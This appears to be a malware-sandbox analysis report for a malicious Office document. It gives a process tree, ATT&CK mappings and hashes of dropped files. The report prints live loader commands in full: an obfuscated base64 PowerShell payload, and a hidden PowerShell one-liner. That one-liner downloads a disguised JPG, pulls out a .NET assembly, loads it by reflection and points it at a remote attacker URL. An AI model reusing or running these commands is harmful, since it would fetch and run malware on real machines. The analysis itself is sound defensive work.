⮦ ꜃ ⤎ ䷙I⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙k⟽ ⮦ ꜃ ⤎ ䷙Gk⟽ ⮦ ꜃ ⤎ ䷙bQBh⟽ ⮦ ꜃ ⤎ ䷙Gc⟽ ⮦ ꜃ ⤎ ䷙ZQBU⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙e⟽ ⮦ ꜃ ⤎ ䷙B0⟽ ⮦ ꜃ ⤎ ䷙C4⟽ ⮦ ꜃ ⤎ ䷙UwB1⟽ ⮦ ꜃ ⤎ ䷙GI⟽ ⮦ ꜃ ⤎ ䷙cwB0⟽ ⮦ ꜃ ⤎ ䷙HI⟽ ⮦ ꜃ ⤎ ䷙aQBu⟽ ⮦ ꜃ ⤎ ䷙Gc⟽ ⮦ ꜃ ⤎ ䷙K⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙k⟽ ⮦ ꜃ ⤎ ䷙HM⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙Bh⟽ ⮦ ꜃ ⤎ ䷙HI⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙BJ⟽ ⮦ ꜃ ⤎ ䷙G4⟽ ⮦ ꜃ ⤎ ䷙Z⟽ ⮦ ꜃ ⤎ ䷙Bl⟽ ⮦ ꜃ ⤎ ䷙Hg⟽ ⮦ ꜃ ⤎ ䷙L⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙g⟽ ⮦ ꜃ ⤎ ䷙CQ⟽ ⮦ ꜃ ⤎ ䷙YgBh⟽ ⮦ ꜃ ⤎ ䷙HM⟽ ⮦ ꜃ ⤎ ䷙ZQ⟽ ⮦ ꜃ ⤎ ䷙2⟽ ⮦ ꜃ ⤎ ䷙DQ⟽ ⮦ ꜃ ⤎ ䷙T⟽ ⮦ ꜃ ⤎ ䷙Bl⟽ ⮦ ꜃ ⤎ ䷙G4⟽ ⮦ ꜃ ⤎ ䷙ZwB0⟽ ⮦ ꜃ ⤎ ䷙Gg⟽ ⮦ ꜃ ⤎ ䷙KQ⟽ ⮦ ꜃ ⤎ ䷙7⟽ ⮦ ꜃ ⤎ ䷙CQ⟽ ⮦ ꜃ ⤎ ䷙YwBv⟽ ⮦ ꜃ ⤎ ䷙G0⟽ ⮦ ꜃ ⤎ ䷙bQBh⟽ ⮦ ꜃ ⤎ ䷙G4⟽ ⮦ ꜃ ⤎ ䷙Z⟽ ⮦ ꜃ ⤎ ䷙BC⟽ ⮦ ꜃ ⤎ ䷙Hk⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙Bl⟽ ⮦ ꜃ ⤎ ䷙HM⟽ ⮦ ꜃ ⤎ ䷙I⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙9⟽ ⮦ ꜃ ⤎ ䷙C⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙WwBT⟽ ⮦ ꜃ ⤎ ䷙Hk⟽ ⮦ ꜃ ⤎ ䷙cwB0⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙bQ⟽ ⮦ ꜃ ⤎ ䷙u⟽ ⮦ ꜃ ⤎ ䷙EM⟽ ⮦ ꜃ ⤎ ䷙bwBu⟽ ⮦ ꜃ ⤎ ䷙HY⟽ ⮦ ꜃ ⤎ ䷙ZQBy⟽ ⮦ ꜃ ⤎ ䷙HQ⟽ ⮦ ꜃ ⤎ ䷙XQ⟽ ⮦ ꜃ ⤎ ䷙6⟽ ⮦ ꜃ ⤎ ䷙Do⟽ ⮦ ꜃ ⤎ ䷙RgBy⟽ ⮦ ꜃ ⤎ ䷙G8⟽ ⮦ ꜃ ⤎ ䷙bQBC⟽ ⮦ ꜃ ⤎ ䷙GE⟽ ⮦ ꜃ ⤎ ䷙cwBl⟽ ⮦ ꜃ ⤎ ䷙DY⟽ ⮦ ꜃ ⤎ ䷙N⟽ ⮦ ꜃ ⤎ ䷙BT⟽ ⮦ ꜃ ⤎ ䷙HQ⟽ ⮦ ꜃ ⤎ ䷙cgBp⟽ ⮦ ꜃ ⤎ ䷙G4⟽ ⮦ ꜃ ⤎ ䷙Zw⟽ ⮦ ꜃ ⤎ ䷙o⟽ ⮦ ꜃ ⤎ ䷙CQ⟽ ⮦ ꜃ ⤎ ䷙YgBh⟽ ⮦ ꜃ ⤎ ䷙HM⟽ ⮦ ꜃ ⤎ ䷙ZQ⟽ ⮦ ꜃ ⤎ ䷙2⟽ ⮦ ꜃ ⤎ ䷙DQ⟽ ⮦ ꜃ ⤎ ䷙QwBv⟽ ⮦ ꜃ ⤎ ䷙G0⟽ ⮦ ꜃ ⤎ ䷙bQBh⟽ ⮦ ꜃ ⤎ ䷙G4⟽ ⮦ ꜃ ⤎ ䷙Z⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙p⟽ ⮦ ꜃ ⤎ ䷙Ds⟽ ⮦ ꜃ ⤎ ䷙J⟽ ⮦ ꜃ ⤎ ䷙Bs⟽ ⮦ ꜃ ⤎ ䷙G8⟽ ⮦ ꜃ ⤎ ䷙YQBk⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙Z⟽ ⮦ ꜃ ⤎ ䷙BB⟽ ⮦ ꜃ ⤎ ䷙HM⟽ ⮦ ꜃ ⤎ ䷙cwBl⟽ ⮦ ꜃ ⤎ ䷙G0⟽ ⮦ ꜃ ⤎ ䷙YgBs⟽ ⮦ ꜃ ⤎ ䷙Hk⟽ ⮦ ꜃ ⤎ ䷙I⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙9⟽ ⮦ ꜃ ⤎ ䷙C⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙WwBT⟽ ⮦ ꜃ ⤎ ䷙Hk⟽ ⮦ ꜃ ⤎ ䷙cwB0⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙bQ⟽ ⮦ ꜃ ⤎ ䷙u⟽ ⮦ ꜃ ⤎ ䷙FI⟽ ⮦ ꜃ ⤎ ䷙ZQBm⟽ ⮦ ꜃ ⤎ ䷙Gw⟽ ⮦ ꜃ ⤎ ䷙ZQBj⟽ ⮦ ꜃ ⤎ ䷙HQ⟽ ⮦ ꜃ ⤎ ䷙aQBv⟽ ⮦ ꜃ ⤎ ䷙G4⟽ ⮦ ꜃ ⤎ ䷙LgBB⟽ ⮦ ꜃ ⤎ ䷙HM⟽ ⮦ ꜃ ⤎ ䷙cwBl⟽ ⮦ ꜃ ⤎ ䷙G0⟽ ⮦ ꜃ ⤎ ䷙YgBs⟽ ⮦ ꜃ ⤎ ䷙Hk⟽ ⮦ ꜃ ⤎ ䷙XQ⟽ ⮦ ꜃ ⤎ ䷙6⟽ ⮦ ꜃ ⤎ ䷙Do⟽ ⮦ ꜃ ⤎ ䷙T⟽ ⮦ ꜃ ⤎ ䷙Bv⟽ ⮦ ꜃ ⤎ ䷙GE⟽ ⮦ ꜃ ⤎ ䷙Z⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙o⟽ ⮦ ꜃ ⤎ ䷙CQ⟽ ⮦ ꜃ ⤎ ䷙YwBv⟽ ⮦ ꜃ ⤎ ䷙G0⟽ ⮦ ꜃ ⤎ ䷙bQBh⟽ ⮦ ꜃ ⤎ ䷙G4⟽ ⮦ ꜃ ⤎ ䷙Z⟽ ⮦ ꜃ ⤎ ䷙BC⟽ ⮦ ꜃ ⤎ ䷙Hk⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙Bl⟽ ⮦ ꜃ ⤎ ䷙HM⟽ ⮦ ꜃ ⤎ ䷙KQ⟽ ⮦ ꜃ ⤎ ䷙7⟽ ⮦ ꜃ ⤎ ䷙CQ⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙B5⟽ ⮦ ꜃ ⤎ ䷙H⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙ZQ⟽ ⮦ ꜃ ⤎ ䷙g⟽ ⮦ ꜃ ⤎ ䷙D0⟽ ⮦ ꜃ ⤎ ䷙I⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙k⟽ ⮦ ꜃ ⤎ ䷙Gw⟽ ⮦ ꜃ ⤎ ䷙bwBh⟽ ⮦ ꜃ ⤎ ䷙GQ⟽ ⮦ ꜃ ⤎ ䷙ZQBk⟽ ⮦ ꜃ ⤎ ䷙EE⟽ ⮦ ꜃ ⤎ ䷙cwBz⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙bQBi⟽ ⮦ ꜃ ⤎ ䷙Gw⟽ ⮦ ꜃ ⤎ ䷙eQ⟽ ⮦ ꜃ ⤎ ䷙u⟽ ⮦ ꜃ ⤎ ䷙Ec⟽ ⮦ ꜃ ⤎ ䷙ZQB0⟽ ⮦ ꜃ ⤎ ䷙FQ⟽ ⮦ ꜃ ⤎ ䷙eQBw⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙K⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙n⟽ ⮦ ꜃ ⤎ ䷙GQ⟽ ⮦ ꜃ ⤎ ䷙bgBs⟽ ⮦ ꜃ ⤎ ䷙Gk⟽ ⮦ ꜃ ⤎ ䷙Yg⟽ ⮦ ꜃ ⤎ ䷙u⟽ ⮦ ꜃ ⤎ ䷙Ek⟽ ⮦ ꜃ ⤎ ䷙Tw⟽ ⮦ ꜃ ⤎ ䷙u⟽ ⮦ ꜃ ⤎ ䷙Eg⟽ ⮦ ꜃ ⤎ ䷙bwBt⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙Jw⟽ ⮦ ꜃ ⤎ ䷙p⟽ ⮦ ꜃ ⤎ ䷙Ds⟽ ⮦ ꜃ ⤎ ䷙J⟽ ⮦ ꜃ ⤎ ䷙Bt⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙Bo⟽ ⮦ ꜃ ⤎ ䷙G8⟽ ⮦ ꜃ ⤎ ䷙Z⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙g⟽ ⮦ ꜃ ⤎ ䷙D0⟽ ⮦ ꜃ ⤎ ䷙I⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙k⟽ ⮦ ꜃ ⤎ ䷙HQ⟽ ⮦ ꜃ ⤎ ䷙eQBw⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙LgBH⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙BN⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙Bo⟽ ⮦ ꜃ ⤎ ䷙G8⟽ ⮦ ꜃ ⤎ ䷙Z⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙o⟽ ⮦ ꜃ ⤎ ䷙Cc⟽ ⮦ ꜃ ⤎ ䷙VgBB⟽ ⮦ ꜃ ⤎ ䷙Ek⟽ ⮦ ꜃ ⤎ ䷙Jw⟽ ⮦ ꜃ ⤎ ䷙p⟽ ⮦ ꜃ ⤎ ䷙C4⟽ ⮦ ꜃ ⤎ ䷙SQBu⟽ ⮦ ꜃ ⤎ ䷙HY⟽ ⮦ ꜃ ⤎ ䷙bwBr⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙K⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙k⟽ ⮦ ꜃ ⤎ ䷙G4⟽ ⮦ ꜃ ⤎ ䷙dQBs⟽ ⮦ ꜃ ⤎ ䷙Gw⟽ ⮦ ꜃ ⤎ ䷙L⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙g⟽ ⮦ ꜃ ⤎ ䷙Fs⟽ ⮦ ꜃ ⤎ ䷙bwBi⟽ ⮦ ꜃ ⤎ ䷙Go⟽ ⮦ ꜃ ⤎ ䷙ZQBj⟽ ⮦ ꜃ ⤎ ䷙HQ⟽ ⮦ ꜃ ⤎ ䷙WwBd⟽ ⮦ ꜃ ⤎ ䷙F0⟽ ⮦ ꜃ ⤎ ䷙I⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙o⟽ ⮦ ꜃ ⤎ ䷙Cc⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙B4⟽ ⮦ ꜃ ⤎ ䷙HQ⟽ ⮦ ꜃ ⤎ ䷙LgBE⟽ ⮦ ꜃ ⤎ ䷙Eg⟽ ⮦ ꜃ ⤎ ䷙S⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙v⟽ ⮦ ꜃ ⤎ ䷙DE⟽ ⮦ ꜃ ⤎ ䷙MQ⟽ ⮦ ꜃ ⤎ ䷙y⟽ ⮦ ꜃ ⤎ ䷙C8⟽ ⮦ ꜃ ⤎ ䷙MQ⟽ ⮦ ꜃ ⤎ ䷙3⟽ ⮦ ꜃ ⤎ ䷙C4⟽ ⮦ ꜃ ⤎ ䷙Mg⟽ ⮦ ꜃ ⤎ ䷙5⟽ ⮦ ꜃ ⤎ ䷙C4⟽ ⮦ ꜃ ⤎ ䷙NQ⟽ ⮦ ꜃ ⤎ ䷙3⟽ ⮦ ꜃ ⤎ ䷙DE⟽ ⮦ ꜃ ⤎ ䷙Lg⟽ ⮦ ꜃ ⤎ ䷙3⟽ ⮦ ꜃ ⤎ ䷙D⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙MQ⟽ ⮦ ꜃ ⤎ ䷙v⟽ ⮦ ꜃ ⤎ ䷙C8⟽ ⮦ ꜃ ⤎ ䷙OgBw⟽ ⮦ ꜃ ⤎ ䷙HQ⟽ ⮦ ꜃ ⤎ ䷙d⟽ ⮦ ꜃ ⤎ ䷙Bo⟽ ⮦ ꜃ ⤎ ䷙Cc⟽ ⮦ ꜃ ⤎ ䷙I⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙s⟽ ⮦ ꜃ ⤎ ䷙C⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙JwBk⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙cwBh⟽ ⮦ ꜃ ⤎ ䷙HQ⟽ ⮦ ꜃ ⤎ ䷙aQB2⟽ ⮦ ꜃ ⤎ ䷙GE⟽ ⮦ ꜃ ⤎ ䷙Z⟽ ⮦ ꜃ ⤎ ䷙Bv⟽ ⮦ ꜃ ⤎ ䷙Cc⟽ ⮦ ꜃ ⤎ ䷙I⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙s⟽ ⮦ ꜃ ⤎ ䷙C⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙JwBk⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙cwBh⟽ ⮦ ꜃ ⤎ ䷙HQ⟽ ⮦ ꜃ ⤎ ䷙aQB2⟽ ⮦ ꜃ ⤎ ䷙GE⟽ ⮦ ꜃ ⤎ ䷙Z⟽ ⮦ ꜃ ⤎ ䷙Bv⟽ ⮦ ꜃ ⤎ ䷙Cc⟽ ⮦ ꜃ ⤎ ䷙I⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙s⟽ ⮦ ꜃ ⤎ ䷙C⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙JwBk⟽ ⮦ ꜃ ⤎ ䷙GU⟽ ⮦ ꜃ ⤎ ䷙cwBh⟽ ⮦ ꜃ ⤎ ䷙HQ⟽ ⮦ ꜃ ⤎ ䷙aQB2⟽ ⮦ ꜃ ⤎ ䷙GE⟽ ⮦ ꜃ ⤎ ䷙Z⟽ ⮦ ꜃ ⤎ ䷙Bv⟽ ⮦ ꜃ ⤎ ䷙Cc⟽ ⮦ ꜃ ⤎ ䷙L⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙n⟽ ⮦ ꜃ ⤎ ䷙FI⟽ ⮦ ꜃ ⤎ ䷙ZQBn⟽ ⮦ ꜃ ⤎ ䷙EE⟽ ⮦ ꜃ ⤎ ䷙cwBt⟽ ⮦ ꜃ ⤎ ䷙Cc⟽ ⮦ ꜃ ⤎ ䷙L⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙n⟽ ⮦ ꜃ ⤎ ䷙Cc⟽ ⮦ ꜃ ⤎ ䷙KQ⟽ ⮦ ꜃ ⤎ ䷙p⟽ ⮦ ꜃ ⤎ ䷙⟽ ⮦ ꜃ ⤎ ䷙==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⟽ ⮦ ꜃ ⤎ ䷙','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2884
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.DHH/112/17.29.571.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Exploitation for Client Execution

1

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
a969bb9a68318e65551512589dff8929

SHA1
b9048e627a0ff8aa7cde3160995f9fc025cb6f49

SHA256
3502d8802301c27c4da458380721a28f14540fecec9e10f0895af1d0202b6811

SHA512
d3d9133fed60e6dab8990f32b0ec56632f50b7447a6d1219c640cb5635bc0afe53d84f6e8a70e28e8276e486fc99c28584af8beb383f476c3aa52f5e5291e5d9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
a6f2844f0206b04d47496b53abd88f54

SHA1
0a9b84d99bb1d6a39ff4f2e67ae2208009bfe479

SHA256
facc232a6728f74b6f57b3208c5077965f4b7d495a6b3a9f3790ff84513425e7

SHA512
4526ebba28a531af686a29d26de3557bdd2385791d508080e72016fa81a7cacf7c69c8fb396a52e3581a784e4228f4c6b3d0fcc3b7393b258cd3912dbf00743d

Download Submit
C:\Users\Admin\AppData\Roaming\buttersweetnessgoodforhealthtose.vBS

Filesize
177KB

MD5
1e7080c333d88565706bf847d134c42a

SHA1
e8b25b358d2fe06f99b062fd63a08c7f2aa2c99d

SHA256
4edca1da81060c61152c6bfc434aeed4c721774e19c9046b088bd2244784f695

SHA512
6558b8ab70e941974ee90c59bebd307a8d6f817bd23461792d3e58cc1a2b56dac56d98411abd7954af46529cfebda738bca2ade5f0468634de881412c0da9bd3

Download Submit
memory/2980-0-0x000000002FF01000-0x000000002FF02000-memory.dmp

Filesize
4KB

Download
memory/2980-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2980-2-0x000000007170D000-0x0000000071718000-memory.dmp

Filesize
44KB

Download
memory/2980-19-0x000000007170D000-0x0000000071718000-memory.dmp

Filesize
44KB

Download
memory/2980-38-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing